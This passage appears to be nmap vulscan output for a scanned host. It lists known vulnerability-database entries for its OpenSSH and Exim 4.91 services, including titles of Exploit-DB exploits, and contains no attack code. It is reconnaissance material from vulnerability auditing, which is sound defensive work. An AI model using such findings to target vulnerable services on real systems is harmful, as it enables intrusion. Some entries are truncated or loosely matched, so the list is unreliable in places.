8619| [36552] Red Hat Enterprise Linux OpenSSH 'ChrootDirectory' Option Local Privilege Escalation Vulnerability
8620| [32319] OpenSSH CBC Mode Information Disclosure Vulnerability
8621| [30794] Red Hat OpenSSH Backdoor Vulnerability
8622| [30339] OpenSSH 'X11UseLocalhost' X11 Forwarding Session Hijacking Vulnerability
8623| [30276] Debian OpenSSH SELinux Privilege Escalation Vulnerability
8624| [28531] OpenSSH ForceCommand Command Execution Weakness
8625| [28444] OpenSSH X Connections Session Hijacking Vulnerability
8626| [26097] OpenSSH LINUX_AUDIT_RECORD_EVENT Remote Log Injection Weakness
8627| [25628] OpenSSH X11 Cookie Local Authentication Bypass Vulnerability
8628| [23601] OpenSSH S/Key Remote Information Disclosure Vulnerability
8629| [20956] OpenSSH Privilege Separation Key Signature Weakness
8630| [20418] OpenSSH-Portable Existing Password Remote Information Disclosure Weakness
8631| [20245] OpenSSH-Portable GSSAPI Authentication Abort Information Disclosure Weakness
8632| [20241] Portable OpenSSH GSSAPI Remote Code Execution Vulnerability
8633| [20216] OpenSSH Duplicated Block Remote Denial of Service Vulnerability
8634| [16892] OpenSSH Remote PAM Denial Of Service Vulnerability
8635| [14963] OpenSSH LoginGraceTime Remote Denial Of Service Vulnerability
8636| [14729] OpenSSH GSSAPI Credential Disclosure Vulnerability
8637| [14727] OpenSSH DynamicForward Inadvertent GatewayPorts Activation Vulnerability
8638| [11781] OpenSSH-portable PAM Authentication Remote Information Disclosure Vulnerability
8639| [9986] RCP, OpenSSH SCP Client File Corruption Vulnerability
8640| [9040] OpenSSH PAM Conversation Memory Scrubbing Weakness
8641| [8677] Multiple Portable OpenSSH PAM Vulnerabilities
8642| [8628] OpenSSH Buffer Mismanagement Vulnerabilities
8643| [7831] OpenSSH Reverse DNS Lookup Access Control Bypass Vulnerability
8644| [7482] OpenSSH Remote Root Authentication Timing Side-Channel Weakness
8645| [7467] OpenSSH-portable Enabled PAM Delay Information Disclosure Vulnerability
8646| [7343] OpenSSH Authentication Execution Path Timing Information Leakage Weakness
8647| [6168] OpenSSH Visible Password Vulnerability
8648| [5374] OpenSSH Trojan Horse Vulnerability
8649| [5093] OpenSSH Challenge-Response Buffer Overflow Vulnerabilities
8650| [4560] OpenSSH Kerberos 4 TGT/AFS Token Buffer Overflow Vulnerability
8651| [4241] OpenSSH Channel Code Off-By-One Vulnerability
8652| [3614] OpenSSH UseLogin Environment Variable Passing Vulnerability
8653| [3560] OpenSSH Kerberos Arbitrary Privilege Elevation Vulnerability
8654| [3369] OpenSSH Key Based Source IP Access Control Bypass Vulnerability
8655| [3345] OpenSSH SFTP Command Restriction Bypassing Vulnerability
8656| [2917] OpenSSH PAM Session Evasion Vulnerability
8657| [2825] OpenSSH Client X11 Forwarding Cookie Removal File Symbolic Link Vulnerability
8658| [2356] OpenSSH Private Key Authentication Check Vulnerability
8659| [1949] OpenSSH Client Unauthorized Remote Forwarding Vulnerability
8660| [1334] OpenSSH UseLogin Vulnerability
8661|
8662| IBM X-Force - https://exchange.xforce.ibmcloud.com:
8663| [83258] GSI-OpenSSH auth-pam.c security bypass
8664| [82781] OpenSSH time limit denial of service
8665| [82231] OpenSSH pam_ssh_agent_auth PAM code execution
8666| [74809] OpenSSH ssh_gssapi_parse_ename denial of service
8667| [72756] Debian openssh-server commands information disclosure
8668| [68339] OpenSSH pam_thread buffer overflow
8669| [67264] OpenSSH ssh-keysign unauthorized access
8670| [65910] OpenSSH remote_glob function denial of service
8671| [65163] OpenSSH certificate information disclosure
8672| [64387] OpenSSH J-PAKE security bypass
8673| [63337] Cisco Unified Videoconferencing OpenSSH weak security
8674| [46620] OpenSSH and multiple SSH Tectia products CBC mode information disclosure
8675| [45202] OpenSSH signal handler denial of service
8676| [44747] RHEL OpenSSH backdoor
8677| [44280] OpenSSH PermitRootLogin information disclosure
8678| [44279] OpenSSH sshd weak security
8679| [44037] OpenSSH sshd SELinux role unauthorized access
8680| [43940] OpenSSH X11 forwarding information disclosure
8681| [41549] OpenSSH ForceCommand directive security bypass
8682| [41438] OpenSSH sshd session hijacking
8683| [40897] OpenSSH known_hosts weak security
8684| [40587] OpenSSH username weak security
8685| [37371] OpenSSH username data manipulation
8686| [37118] RHSA update for OpenSSH privilege separation monitor authentication verification weakness not installed
8687| [37112] RHSA update for OpenSSH signal handler race condition not installed
8688| [37107] RHSA update for OpenSSH identical block denial of service not installed
8689| [36637] OpenSSH X11 cookie privilege escalation
8690| [35167] OpenSSH packet.c newkeys[mode] denial of service
8691| [34490] OpenSSH OPIE information disclosure
8692| [33794] OpenSSH ChallengeResponseAuthentication information disclosure
8693| [32975] Apple Mac OS X OpenSSH denial of service
8694| [32387] RHSA-2006:0738 updates for openssh not installed
8695| [32359] RHSA-2006:0697 updates for openssh not installed
8696| [32230] RHSA-2006:0298 updates for openssh not installed
8697| [32132] RHSA-2006:0044 updates for openssh not installed
8698| [30120] OpenSSH privilege separation monitor authentication verification weakness
8699| [29255] OpenSSH GSSAPI user enumeration
8700| [29254] OpenSSH signal handler race condition
8701| [29158] OpenSSH identical block denial of service
8702| [28147] Apple Mac OS X OpenSSH nonexistent user login denial of service
8703| [25116] OpenSSH OpenPAM denial of service
8704| [24305] OpenSSH SCP shell expansion command execution
8705| [22665] RHSA-2005:106 updates for openssh not installed
8706| [22117] OpenSSH GSSAPI allows elevated privileges
8707| [22115] OpenSSH GatewayPorts security bypass
8708| [20930] OpenSSH sshd.c LoginGraceTime denial of service
8709| [19441] Sun Solaris OpenSSH LDAP (1) client authentication denial of service
8710| [17213] OpenSSH allows port bouncing attacks
8711| [16323] OpenSSH scp file overwrite
8712| [13797] OpenSSH PAM information leak
8713| [13271] OpenSSH could allow an attacker to corrupt the PAM conversion stack
8714| [13264] OpenSSH PAM code could allow an attacker to gain access
8715| [13215] OpenSSH buffer management errors could allow an attacker to execute code
8716| [13214] OpenSSH memory vulnerabilities
8717| [13191] OpenSSH large packet buffer overflow
8718| [12196] OpenSSH could allow an attacker to bypass login restrictions
8719| [11970] OpenSSH could allow an attacker to obtain valid administrative account
8720| [11902] OpenSSH PAM support enabled information leak
8721| [9803] OpenSSH "
8722| [9763] OpenSSH downloaded from the OpenBSD FTP site or OpenBSD FTP mirror sites could contain a Trojan Horse
8723| [9307] OpenSSH is running on the system
8724| [9169] OpenSSH "
8725| [8896] OpenSSH Kerberos 4 TGT/AFS buffer overflow
8726| [8697] FreeBSD libutil in OpenSSH fails to drop privileges prior to using the login class capability database
8727| [8383] OpenSSH off-by-one error in channel code
8728| [7647] OpenSSH UseLogin option arbitrary code execution
8729| [7634] OpenSSH using sftp and restricted keypairs could allow an attacker to bypass restrictions
8730| [7598] OpenSSH with Kerberos allows attacker to gain elevated privileges
8731| [7179] OpenSSH source IP access control bypass
8732| [6757] OpenSSH "
8733| [6676] OpenSSH X11 forwarding symlink attack could allow deletion of arbitrary files
8734| [6084] OpenSSH 2.3.1 allows remote users to bypass authentication
8735| [5517] OpenSSH allows unauthorized access to resources
8736| [4646] OpenSSH UseLogin option allows remote users to execute commands as root
8737|
8738| Exploit-DB - https://www.exploit-db.com:
8739| [21579] OpenSSH 3.x Challenge-Response Buffer Overflow Vulnerabilities (2)
8740| [21578] OpenSSH 3.x Challenge-Response Buffer Overflow Vulnerabilities (1)
8741| [21402] OpenSSH 2.x/3.x Kerberos 4 TGT/AFS Token Buffer Overflow Vulnerability
8742| [21314] OpenSSH 2.x/3.0.1/3.0.2 Channel Code Off-By-One Vulnerability
8743| [20253] OpenSSH 1.2 scp File Create/Overwrite Vulnerability
8744| [17462] FreeBSD OpenSSH 3.5p1 - Remote Root Exploit
8745| [14866] Novell Netware 6.5 - OpenSSH Remote Stack Overflow
8746| [6094] Debian OpenSSH Remote SELinux Privilege Elevation Exploit (auth)
8747| [3303] Portable OpenSSH <= 3.6.1p-PAM / 4.1-SUSE Timing Attack Exploit
8748| [2444] OpenSSH <= 4.3 p1 (Duplicated Block) Remote Denial of Service Exploit
8749| [1572] Dropbear / OpenSSH Server (MAX_UNAUTH_CLIENTS) Denial of Service
8750| [258] glibc-2.2 and openssh-2.3.0p1 exploits glibc => 2.1.9x
8751| [26] OpenSSH/PAM <= 3.6.1p1 Remote Users Ident (gossh.sh)
8752| [25] OpenSSH/PAM <= 3.6.1p1 Remote Users Discovery Tool
8753|
8754| OpenVAS (Nessus) - http://www.openvas.org:
8755| [902488] OpenSSH 'sshd' GSSAPI Credential Disclosure Vulnerability
8756| [900179] OpenSSH CBC Mode Information Disclosure Vulnerability
8757| [881183] CentOS Update for openssh CESA-2012:0884 centos6
8758| [880802] CentOS Update for openssh CESA-2009:1287 centos5 i386
8759| [880746] CentOS Update for openssh CESA-2009:1470 centos5 i386
8760| [870763] RedHat Update for openssh RHSA-2012:0884-04
8761| [870129] RedHat Update for openssh RHSA-2008:0855-01
8762| [861813] Fedora Update for openssh FEDORA-2010-5429
8763| [861319] Fedora Update for openssh FEDORA-2007-395
8764| [861170] Fedora Update for openssh FEDORA-2007-394
8765| [861012] Fedora Update for openssh FEDORA-2007-715
8766| [840345] Ubuntu Update for openssh vulnerability USN-597-1
8767| [840300] Ubuntu Update for openssh update USN-612-5
8768| [840271] Ubuntu Update for openssh vulnerability USN-612-2
8769| [840268] Ubuntu Update for openssh update USN-612-7
8770| [840259] Ubuntu Update for openssh vulnerabilities USN-649-1
8771| [840214] Ubuntu Update for openssh vulnerability USN-566-1
8772| [831074] Mandriva Update for openssh MDVA-2010:162 (openssh)
8773| [830929] Mandriva Update for openssh MDVA-2010:090 (openssh)
8774| [830807] Mandriva Update for openssh MDVA-2010:026 (openssh)
8775| [830603] Mandriva Update for openssh MDVSA-2008:098 (openssh)
8776| [830523] Mandriva Update for openssh MDVSA-2008:078 (openssh)
8777| [830317] Mandriva Update for openssh-askpass-qt MDKA-2007:127 (openssh-askpass-qt)
8778| [830191] Mandriva Update for openssh MDKSA-2007:236 (openssh)
8779| [802407] OpenSSH 'sshd' Challenge Response Authentication Buffer Overflow Vulnerability
8780| [103503] openssh-server Forced Command Handling Information Disclosure Vulnerability
8781| [103247] OpenSSH Ciphersuite Specification Information Disclosure Weakness
8782| [103064] OpenSSH Legacy Certificate Signing Information Disclosure Vulnerability
8783| [100584] OpenSSH X Connections Session Hijacking Vulnerability
8784| [100153] OpenSSH CBC Mode Information Disclosure Vulnerability
8785| [66170] CentOS Security Advisory CESA-2009:1470 (openssh)
8786| [65987] SLES10: Security update for OpenSSH
8787| [65819] SLES10: Security update for OpenSSH
8788| [65514] SLES9: Security update for OpenSSH
8789| [65513] SLES9: Security update for OpenSSH
8790| [65334] SLES9: Security update for OpenSSH
8791| [65248] SLES9: Security update for OpenSSH
8792| [65218] SLES9: Security update for OpenSSH
8793| [65169] SLES9: Security update for openssh,openssh-askpass
8794| [65126] SLES9: Security update for OpenSSH
8795| [65019] SLES9: Security update for OpenSSH
8796| [65015] SLES9: Security update for OpenSSH
8797| [64931] CentOS Security Advisory CESA-2009:1287 (openssh)
8798| [61639] Debian Security Advisory DSA 1638-1 (openssh)
8799| [61030] Debian Security Advisory DSA 1576-2 (openssh)
8800| [61029] Debian Security Advisory DSA 1576-1 (openssh)
8801| [60840] FreeBSD Security Advisory (FreeBSD-SA-08:05.openssh.asc)
8802| [60803] Gentoo Security Advisory GLSA 200804-03 (openssh)
8803| [60667] Slackware Advisory SSA:2008-095-01 openssh
8804| [59014] Slackware Advisory SSA:2007-255-01 openssh
8805| [58741] Gentoo Security Advisory GLSA 200711-02 (openssh)
8806| [57919] Gentoo Security Advisory GLSA 200611-06 (openssh)
8807| [57895] Gentoo Security Advisory GLSA 200609-17 (openssh)
8808| [57585] Debian Security Advisory DSA 1212-1 (openssh (1:3.8.1p1-8.sarge.6))
8809| [57492] Slackware Advisory SSA:2006-272-02 openssh
8810| [57483] Debian Security Advisory DSA 1189-1 (openssh-krb5)
8811| [57476] FreeBSD Security Advisory (FreeBSD-SA-06:22.openssh.asc)
8812| [57470] FreeBSD Ports: openssh
8813| [56352] FreeBSD Security Advisory (FreeBSD-SA-06:09.openssh.asc)
8814| [56330] Gentoo Security Advisory GLSA 200602-11 (OpenSSH)
8815| [56294] Slackware Advisory SSA:2006-045-06 openssh
8816| [53964] Slackware Advisory SSA:2003-266-01 New OpenSSH packages
8817| [53885] Slackware Advisory SSA:2003-259-01 OpenSSH Security Advisory
8818| [53884] Slackware Advisory SSA:2003-260-01 OpenSSH updated again
8819| [53788] Debian Security Advisory DSA 025-1 (openssh)
8820| [52638] FreeBSD Security Advisory (FreeBSD-SA-03:15.openssh.asc)
8821| [52635] FreeBSD Security Advisory (FreeBSD-SA-03:12.openssh.asc)
8822| [11343] OpenSSH Client Unauthorized Remote Forwarding
8823| [10954] OpenSSH AFS/Kerberos ticket/token passing
8824| [10883] OpenSSH Channel Code Off by 1
8825| [10823] OpenSSH UseLogin Environment Variables
8826|
8827| SecurityTracker - https://www.securitytracker.com:
8828| [1028187] OpenSSH pam_ssh_agent_auth Module on Red Hat Enterprise Linux Lets Remote Users Execute Arbitrary Code
8829| [1026593] OpenSSH Lets Remote Authenticated Users Obtain Potentially Sensitive Information
8830| [1025739] OpenSSH on FreeBSD Has Buffer Overflow in pam_thread() That Lets Remote Users Execute Arbitrary Code
8831| [1025482] OpenSSH ssh-keysign Utility Lets Local Users Gain Elevated Privileges
8832| [1025028] OpenSSH Legacy Certificates May Disclose Stack Contents to Remote Users
8833| [1022967] OpenSSH on Red Hat Enterprise Linux Lets Remote Authenticated Users Gain Elevated Privileges
8834| [1021235] OpenSSH CBC Mode Error Handling May Let Certain Remote Users Obtain Plain Text in Certain Cases
8835| [1020891] OpenSSH on Debian Lets Remote Users Prevent Logins
8836| [1020730] OpenSSH for Red Hat Enterprise Linux Packages May Have Been Compromised
8837| [1020537] OpenSSH on HP-UX Lets Local Users Hijack X11 Sessions
8838| [1019733] OpenSSH Unsafe Default Configuration May Let Local Users Execute Arbitrary Commands
8839| [1019707] OpenSSH Lets Local Users Hijack Forwarded X Sessions in Certain Cases
8840| [1017756] Apple OpenSSH Key Generation Process Lets Remote Users Deny Service
8841| [1017183] OpenSSH Privilege Separation Monitor Validation Error May Cause the Monitor to Fail to Properly Control the Unprivileged Process
8842| [1016940] OpenSSH Race Condition in Signal Handler Lets Remote Users Deny Service and May Potentially Permit Code Execution
8843| [1016939] OpenSSH GSSAPI Authentication Abort Error Lets Remote Users Determine Valid Usernames
8844| [1016931] OpenSSH SSH v1 CRC Attack Detection Implementation Lets Remote Users Deny Service
8845| [1016672] OpenSSH on Mac OS X Lets Remote Users Deny Service
8846| [1015706] OpenSSH Interaction With OpenPAM Lets Remote Users Deny Service
8847| [1015540] OpenSSH scp Double Shell Character Expansion During Local-to-Local Copying May Let Local Users Gain Elevated Privileges in Certain Cases
8848| [1014845] OpenSSH May Unexpectedly Activate GatewayPorts and Also May Disclose GSSAPI Credentials in Certain Cases
8849| [1011193] OpenSSH scp Directory Traversal Flaw Lets Remote SSH Servers Overwrite Files in Certain Cases
8850| [1011143] OpenSSH Default Configuration May Be Unsafe When Used With Anonymous SSH Services
8851| [1007791] Portable OpenSSH PAM free() Bug May Let Remote Users Execute Root Code
8852| [1007716] OpenSSH buffer_append_space() and Other Buffer Management Errors May Let Remote Users Execute Arbitrary Code
8853| [1006926] OpenSSH Host Access Restrictions Can Be Bypassed By Remote Users
8854| [1006688] OpenSSH Timing Flaw With Pluggable Authentication Modules Can Disclose Valid User Account Names to Remote Users
8855| [1004818] OpenSSH's Secure Shell (SSH) Implementation Weakness May Disclose User Passwords to Remote Users During Man-in-the-Middle Attacks
8856| [1004616] OpenSSH Integer Overflow and Buffer Overflow May Allow Remote Users to Gain Root Access to the System
8857| [1004391] OpenSSH 'BSD_AUTH' Access Control Bug May Allow Unauthorized Remote Users to Authenticated to the System
8858| [1004115] OpenSSH Buffer Overflow in Kerberos Ticket and AFS Token Processing Lets Local Users Execute Arbitrary Code With Root Level Permissions
8859| [1003758] OpenSSH Off-by-one 'Channels' Bug May Let Authorized Remote Users Execute Arbitrary Code with Root Privileges
8860| [1002895] OpenSSH UseLogin Environment Variable Bug Lets Local Users Execute Commands and Gain Root Access
8861| [1002748] OpenSSH 3.0 Denial of Service Condition May Allow Remote Users to Crash the sshd Daemon and KerberosV Configuration Error May Allow Remote Users to Partially Authenticate When Authentication Should Not Be Permitted
8862| [1002734] OpenSSH's S/Key Implementation Information Disclosure Flaw Provides Remote Users With Information About Valid User Accounts
8863| [1002455] OpenSSH May Fail to Properly Restrict IP Addresses in Certain Configurations
8864| [1002432] OpenSSH's Sftp-server Subsystem Lets Authorized Remote Users with Restricted Keypairs Obtain Additional Access on the Server
8865| [1001683] OpenSSH Allows Authorized Users to Delete Other User Files Named Cookies
8866|
8867| OSVDB - http://www.osvdb.org:
8868| [92034] GSI-OpenSSH auth-pam.c Memory Management Authentication Bypass
8869| [90474] Red Hat / Fedora PAM Module for OpenSSH Incorrect error() Function Calling Local Privilege Escalation
8870| [90007] OpenSSH logingracetime / maxstartup Threshold Connection Saturation Remote DoS
8871| [81500] OpenSSH gss-serv.c ssh_gssapi_parse_ename Function Field Length Value Parsing Remote DoS
8872| [78706] OpenSSH auth-options.c sshd auth_parse_options Function authorized_keys Command Option Debug Message Information Disclosure
8873| [75753] OpenSSH PAM Module Aborted Conversation Local Information Disclosure
8874| [75249] OpenSSH sftp-glob.c remote_glob Function Glob Expression Parsing Remote DoS
8875| [75248] OpenSSH sftp.c process_put Function Glob Expression Parsing Remote DoS
8876| [72183] Portable OpenSSH ssh-keysign ssh-rand-helper Utility File Descriptor Leak Local Information Disclosure
8877| [70873] OpenSSH Legacy Certificates Stack Memory Disclosure
8878| [69658] OpenSSH J-PAKE Public Parameter Validation Shared Secret Authentication Bypass
8879| [67743] Novell NetWare OpenSSH SSHD.NLM Absolute Path Handling Remote Overflow
8880| [59353] OpenSSH sshd Local TCP Redirection Connection Masking Weakness
8881| [58495] OpenSSH sshd ChrootDirectory Feature SetUID Hard Link Local Privilege Escalation
8882| [56921] OpenSSH Unspecified Remote Compromise
8883| [53021] OpenSSH on ftp.openbsd.org Trojaned Distribution
8884| [50036] OpenSSH CBC Mode Chosen Ciphertext 32-bit Chunk Plaintext Context Disclosure
8885| [49386] OpenSSH sshd TCP Connection State Remote Account Enumeration
8886| [48791] OpenSSH on Debian sshd Crafted Username Arbitrary Remote SELinux Role Access
8887| [47635] OpenSSH Packages on Red Hat Enterprise Linux Compromised Distribution
8888| [47227] OpenSSH X11UseLocalhost X11 Forwarding Port Hijacking
8889| [45873] Cisco WebNS SSHield w/ OpenSSH Crafted Large Packet Remote DoS
8890| [43911] OpenSSH ~/.ssh/rc ForceCommand Bypass Arbitrary Command Execution
8891| [43745] OpenSSH X11 Forwarding Local Session Hijacking
8892| [43371] OpenSSH Trusted X11 Cookie Connection Policy Bypass
8893| [39214] OpenSSH linux_audit_record_event Crafted Username Audit Log Injection
8894| [37315] pam_usb OpenSSH Authentication Unspecified Issue
8895| [34850] OpenSSH on Mac OS X Key Generation Remote Connection DoS
8896| [34601] OPIE w/ OpenSSH Account Enumeration
8897| [34600] OpenSSH S/KEY Authentication Account Enumeration
8898| [32721] OpenSSH Username Password Complexity Account Enumeration
8899| [30232] OpenSSH Privilege Separation Monitor Weakness
8900| [29494] OpenSSH packet.c Invalid Protocol Sequence Remote DoS
8901| [29266] OpenSSH GSSAPI Authentication Abort Username Enumeration
8902| [29264] OpenSSH Signal Handler Pre-authentication Race Condition Code Execution
8903| [29152] OpenSSH Identical Block Packet DoS
8904| [27745] Apple Mac OS X OpenSSH Nonexistent Account Login Enumeration DoS
8905| [23797] OpenSSH with OpenPAM Connection Saturation Forked Process Saturation DoS
8906| [22692] OpenSSH scp Command Line Filename Processing Command Injection
8907| [20216] OpenSSH with KerberosV Remote Authentication Bypass
8908| [19142] OpenSSH Multiple X11 Channel Forwarding Leaks
8909| [19141] OpenSSH GSSAPIAuthentication Credential Escalation
8910| [18236] OpenSSH no pty Command Execution Local PAM Restriction Bypass
8911| [16567] OpenSSH Privilege Separation LoginGraceTime DoS
8912| [16039] Solaris 108994 Series Patch OpenSSH LDAP Client Authentication DoS
8913| [9562] OpenSSH Default Configuration Anon SSH Service Port Bounce Weakness
8914| [9550] OpenSSH scp Traversal Arbitrary File Overwrite
8915| [6601] OpenSSH *realloc() Unspecified Memory Errors
8916| [6245] OpenSSH SKEY/BSD_AUTH Challenge-Response Remote Overflow
8917| [6073] OpenSSH on FreeBSD libutil Arbitrary File Read
8918| [6072] OpenSSH PAM Conversation Function Stack Modification
8919| [6071] OpenSSH SSHv1 PAM Challenge-Response Authentication Privilege Escalation
8920| [5536] OpenSSH sftp-server Restricted Keypair Restriction Bypass
8921| [5408] OpenSSH echo simulation Information Disclosure
8922| [5113] OpenSSH NIS YP Netgroups Authentication Bypass
8923| [4536] OpenSSH Portable AIX linker Privilege Escalation
8924| [3938] OpenSSL and OpenSSH /dev/random Check Failure
8925| [3456] OpenSSH buffer_append_space() Heap Corruption
8926| [2557] OpenSSH Multiple Buffer Management Multiple Overflows
8927| [2140] OpenSSH w/ PAM Username Validity Timing Attack
8928| [2112] OpenSSH Reverse DNS Lookup Bypass
8929| [2109] OpenSSH sshd Root Login Timing Side-Channel Weakness
8930| [1853] OpenSSH Symbolic Link 'cookies' File Removal
8931| [839] OpenSSH PAMAuthenticationViaKbdInt Challenge-Response Remote Overflow
8932| [781] OpenSSH Kerberos TGT/AFS Token Passing Remote Overflow
8933| [730] OpenSSH Channel Code Off by One Remote Privilege Escalation
8934| [688] OpenSSH UseLogin Environment Variable Local Command Execution
8935| [642] OpenSSH Multiple Key Type ACL Bypass
8936| [504] OpenSSH SSHv2 Public Key Authentication Bypass
8937| [341] OpenSSH UseLogin Local Privilege Escalation
8938|_
893923/tcp filtered telnet
894025/tcp open smtp Exim smtpd 4.91
8941| vulscan: VulDB - https://vuldb.com:
8942| [141327] Exim up to 4.92.1 Backslash privilege escalation
8943| [138827] Exim up to 4.92 Expansion Code Execution
8944| [135932] Exim up to 4.92 privilege escalation
8945| [113048] Exim up to 4.90 SMTP Listener Message memory corruption
8946| [109969] Exim 4.88/4.89 SMTP Daemon receive.c bdat_getc denial of service
8947| [109968] Exim 4.88/4.89 SMTP Daemon receive.c receive_msg memory corruption
8948| [94599] Exim up to 4.87 information disclosure
8949| [13422] Exim 4.82 Mail Header dmarc.c expand_string memory corruption
8950| [6817] Exim up to 4.80 src/dkim.c dkim_exim_query_dns_txt memory corruption
8951| [58841] exim up to 4.69 dkim_exim_verify_finish memory corruption
8952| [57462] Exim up to 4.75 Filesystem memory corruption
8953| [4280] Exim Server 4.x open_log race condition
8954|
8955| MITRE CVE - https://cve.mitre.org:
8956| [CVE-2012-5671] Heap-based buffer overflow in the dkim_exim_query_dns_txt function in dkim.c in Exim 4.70 through 4.80, when DKIM support is enabled and acl_smtp_connect and acl_smtp_rcpt are not set to "warn control = dkim_disable_verify," allows remote attackers to execute arbitrary code via an email from a malicious DNS server.
8957| [CVE-2012-0478] The texImage2D implementation in the WebGL subsystem in Mozilla Firefox 4.x through 11.0, Firefox ESR 10.x before 10.0.4, Thunderbird 5.0 through 11.0, Thunderbird ESR 10.x before 10.0.4, and SeaMonkey before 2.9 does not properly restrict JSVAL_TO_OBJECT casts, which might allow remote attackers to execute arbitrary code via a crafted web page.
8958| [CVE-2011-1764] Format string vulnerability in the dkim_exim_verify_finish function in src/dkim.c in Exim before 4.76 might allow remote attackers to execute arbitrary code or cause a denial of service (daemon crash) via format string specifiers in data used in DKIM logging, as demonstrated by an identity field containing a % (percent) character.
8959| [CVE-2011-1407] The DKIM implementation in Exim 4.7x before 4.76 permits matching for DKIM identities to apply to lookup items, instead of only strings, which allows remote attackers to execute arbitrary code or access a filesystem via a crafted identity.
8960| [CVE-2011-0017] The open_log function in log.c in Exim 4.72 and earlier does not check the return value from (1) setuid or (2) setgid system calls, which allows local users to append log data to arbitrary files via a symlink attack.
8961| [CVE-2010-4345] Exim 4.72 and earlier allows local users to gain privileges by leveraging the ability of the exim user account to specify an alternate configuration file with a directive that contains arbitrary commands, as demonstrated by the spool_directory directive.
8962| [CVE-2010-4344] Heap-based buffer overflow in the string_vformat function in string.c in Exim before 4.70 allows remote attackers to execute arbitrary code via an SMTP session that includes two MAIL commands in conjunction with a large message containing crafted headers, leading to improper rejection logging.
8963| [CVE-2010-2024] transports/appendfile.c in Exim before 4.72, when MBX locking is enabled, allows local users to change permissions of arbitrary files or create arbitrary files, and cause a denial of service or possibly gain privileges, via a symlink attack on a lockfile in /tmp/.
8964| [CVE-2010-2023] transports/appendfile.c in Exim before 4.72, when a world-writable sticky-bit mail directory is used, does not verify the st_nlink field of mailbox files, which allows local users to cause a denial of service or possibly gain privileges by creating a hard link to another user's file.
8965| [CVE-2006-1251] Argument injection vulnerability in greylistclean.cron in sa-exim 4.2 allows remote attackers to delete arbitrary files via an email with a To field that contains a filename separated by whitespace, which is not quoted when greylistclean.cron provides the argument to the rm command.
8966| [CVE-2005-0022] Buffer overflow in the spa_base64_to_bits function in Exim before 4.43, as originally obtained from Samba code, and as called by the auth_spa_client function, may allow attackers to execute arbitrary code during SPA authentication.
8967| [CVE-2005-0021] Multiple buffer overflows in Exim before 4.43 may allow attackers to execute arbitrary code via (1) an IPv6 address with more than 8 components, as demonstrated using the -be command line option, which triggers an overflow in the host_aton function, or (2) the -bh command line option or dnsdb PTR lookup, which triggers an overflow in the dns_build_reverse function.
8968| [CVE-2004-0400] Stack-based buffer overflow in Exim 4 before 4.33, when the headers_check_syntax option is enabled, allows remote attackers to cause a denial of service and possibly execute arbitrary code during the header check.
8969| [CVE-2004-0399] Stack-based buffer overflow in Exim 3.35, and other versions before 4, when the sender_verify option is true, allows remote attackers to cause a denial of service and possibly execute arbitrary code during sender verification.
8970| [CVE-2003-0743] Heap-based buffer overflow in smtp_in.c for Exim 3 (exim3) before 3.36 and Exim 4 (exim4) before 4.21 may allow remote attackers to execute arbitrary code via an invalid (1) HELO or (2) EHLO argument with a large number of spaces followed by a NULL character and a newline, which is not properly trimmed before the "(no argument given)" string is appended to the buffer.
8971| [CVE-2002-1381] Format string vulnerability in daemon.c for Exim 4.x through 4.10, and 3.x through 3.36, allows exim administrative users to execute arbitrary code by modifying the pid_file_path value.
8972|
8973| SecurityFocus - https://www.securityfocus.com/bid/:
8974| [103049] Exim 'base64d()' Function Buffer Overflow Vulnerability
8975| [99252] Exim CVE-2017-1000369 Local Privilege Escalation Vulnerability
8976| [94947] Exim CVE-2016-9963 Unspecified Information Disclosure Vulnerability
8977| [84132] Exim CVE-2016-1531 Local Privilege Escalation Vulnerability
8978| [68857] Exim CVE-2014-2972 Local Privilege Escalation Vulnerability
8979| [67695] Exim 'dmarc.c' Remote Code Execution Vulnerability
8980| [60465] Exim for Dovecot 'use_shell' Remote Command Execution Vulnerability
8981| [56285] Exim DKIM DNS Decoding CVE-2012-5671 Remote Buffer Overflow Vulnerability
8982| [47836] Exim DKIM CVE-2011-1407 Remote Code Execution Vulnerability
8983| [47736] Exim 'dkim_exim_verify_finish()' Remote Format String Vulnerability
8984| [46065] Exim 'log.c' Local Privilege Escalation Vulnerability
8985| [45341] Exim ALT_CONFIG_ROOT_ONLY 'exim' User Local Privilege Escalation Vulnerability
8986| [45308] Exim Crafted Header Remote Code Execution Vulnerability
8987| [40454] Exim MBX Locking Insecure Temporary File Creation Vulnerability
8988| [40451] Exim Sticky Mail Directory Local Privilege Escalation Vulnerability
8989| [36181] ikiwiki 'teximg' Plugin Insecure TeX Commands Information Disclosure Vulnerability
8990| [23977] Exim SpamAssassin Reply Remote Buffer Overflow Vulnerability
8991| [17110] sa-exim Unauthorized File Access Vulnerability
8992| [12268] Exim IP Address Command Line Argument Local Buffer Overflow Vulnerability
8993| [12188] Exim SPA Authentication Remote Buffer Overflow Vulnerability
8994| [12185] Exim Illegal IPv6 Address Buffer Overflow Vulnerability
8995| [10291] Exim Header Syntax Checking Remote Stack Buffer Overrun Vulnerability
8996| [10290] Exim Sender Verification Remote Stack Buffer Overrun Vulnerability
8997| [8518] Exim EHLO/HELO Remote Heap Corruption Vulnerability
8998| [6314] Exim Internet Mailer Format String Vulnerability
8999| [4096] Exim Configuration File Argument Command Line Buffer Overflow Vulnerability
9000| [3728] Exim Pipe Hostname Arbitrary Command Execution Vulnerability
9001| [2828] Exim Format String Vulnerability
9002| [1859] Exim Buffer Overflow Vulnerability
9003|
9004| IBM X-Force - https://exchange.xforce.ibmcloud.com:
9005| [84758] Exim sender_address parameter command execution
9006| [84015] Exim command execution
9007| [80186] Mozilla Firefox, Thunderbird, and SeaMonkey copyTexImage2D code execution
9008| [80184] Mozilla Firefox, Thunderbird, and SeaMonkey texImage2D calls code execution
9009| [79615] Exim dkim_exim_query_dns_txt() buffer overflow
9010| [75155] Mozilla Firefox, Thunderbird, and SeaMonkey texImage2D denial of service
9011| [67455] Exim DKIM processing code execution
9012| [67299] Exim dkim_exim_verify_finish() format string
9013| [65028] Exim open_log privilege escalation
9014| [63967] Exim config file privilege escalation
9015| [63960] Exim header buffer overflow
9016| [59043] Exim mail directory privilege escalation
9017| [59042] Exim MBX symlink
9018| [52922] ikiwiki teximg plugin information disclosure
9019| [34265] Exim spamd buffer overflow
9020| [25286] Sa-exim greylistclean.cron file deletion
9021| [22687] RHSA-2005:025 updates for exim not installed
9022| [18901] Exim dns_build_reverse buffer overflow
9023| [18764] Exim spa_base64_to_bits function buffer overflow
9024| [18763] Exim host_aton buffer overflow
9025| [16079] Exim require_verify buffer overflow
9026| [16077] Exim header_check_syntax buffer overflow
9027| [16075] Exim sender_verify buffer overflow
9028| [13067] Exim HELO or EHLO command heap overflow
